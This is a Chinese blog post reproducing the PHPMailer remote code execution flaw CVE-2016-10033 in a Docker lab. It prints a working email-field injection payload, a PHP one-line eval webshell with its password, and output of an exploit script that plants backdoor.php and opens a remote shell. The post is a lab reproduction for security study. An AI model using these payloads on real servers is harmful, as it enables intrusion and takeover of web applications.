PHPMailer遠端命令執行漏洞復現

thelostworld-公眾號發表於2020-12-31

​PHPMailer遠端命令執行漏洞復現

一、漏洞簡介

PHPMailer是PHP電子郵件建立及傳輸類,用於多個開源專案:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞,可使未經身份驗證的遠端攻擊者在Web伺服器使用者上下文中執行任意程式碼,遠端控制目標web應用。

二、影響版本:

PHPMailer<5.2.18

三、漏洞復現

Docker環境:

dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

拉去映象啟動環境:

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name處隨便輸入比如“aaa”,在email處輸入:​"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message處輸入一句話木馬:​<?php@eval($_POST['thelostworld']);?>

上傳完一句話木馬後,頁面會響應3-5分鐘,響應時間較長

木馬地址:http://192.168.1.107:8080/a.php 密碼:thelostworld

 虛擬終端:

使用指令碼:

獲取指令碼後臺回覆“PHPMailer”獲取指令碼

➜  Desktop ./exploit.sh192.168.1.107:8080[+] CVE-2016-10033exploitbyopsxcq[+] Exploiting192.168.1.107:8080​​[+] Target exploited, acessing shell at http://192.168.1.107:8080/backdoor.php[+] Checkingifthe backdoor was createdontarget system[+] Backdoor.php foundonremote system[+] Running whoamiwww-dataRemoteShell> [+] Running ​​RemoteShell> id[+] Running iduid=33(www-data) gid=33(www-data) groups=33(www-data)

訪問木馬地址:

http://192.168.1.107:8080/backdoor.php

參考:

https://www.cnblogs.com/Hi-blog/p/7812008.html

https://www.exploit-db.com/exploits/40968

免責宣告:本站提供安全工具、程式(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!

轉載宣告:著作權歸作者所有。商業轉載請聯絡作者獲得授權,非商業轉載請註明出處。

訂閱檢視更多復現文章、學習筆記

thelostworld

安全路上,與你並肩前行!!!!

個人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

個人簡書:https://www.jianshu.com/u/bf0e38a8d400

個人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

個人部落格園:https://www.cnblogs.com/thelostworld/

FREEBUF主頁:https://www.freebuf.com/author/thelostworld?type=article

歡迎新增本公眾號作者微信交流,新增時備註一下“公眾號”

 

相關文章